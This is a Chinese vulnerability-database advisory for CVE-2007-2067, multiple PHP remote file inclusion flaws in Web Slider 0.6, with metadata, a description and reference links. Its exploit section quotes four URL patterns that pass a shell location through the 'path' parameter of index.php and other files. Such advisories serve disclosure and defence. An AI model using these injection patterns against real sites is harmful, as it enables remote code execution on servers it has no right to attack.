Marco Antonio Islas Cruz Web Slider 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112715 漏洞类型 未知
发布时间 2007-04-15 更新时间 2007-04-17
CVE编号 CVE-2007-2067 CNNVD-ID CNNVD-200704-302
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3745
https://www.securityfocus.com/bid/86333
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-302
|漏洞详情
MarcoAntonioIslasCruzWebSlider(WebSlider)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)index.php,(2)modules/pdf.php,(3)plugins/highlight.php或(4)include/modules.php文件的路径参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/webslider/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/index.php?path=Shell
# Exploit:[Path]/modules/pdf.php?path=Shell
# Exploit:[Path]/plugins/highlight.php?path=Shell
# Exploit:[Path]/include/modules.php?path=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]
|受影响的产品
Webslider Webslider 0.6
|参考资料

来源:XF
名称:webslider-path-file-include(33689)
链接:http://xforce.iss.net/xforce/xfdb/33689
来源:MILW0RM
名称:3745
链接:http://www.milw0rm.com/exploits/3745
来源:VUPEN
名称:ADV-2007-1397
链接:http://www.frsirt.com/english/advisories/2007/1397
来源:OSVDB
名称:37439
链接:http://osvdb.org/37439
来源:OSVDB
名称:37438
链接:http://osvdb.org/37438
来源:OSVDB
名称:37437
链接:http://osvdb.org/37437
来源:OSVDB
名称:37436
链接:http://osvdb.org/37436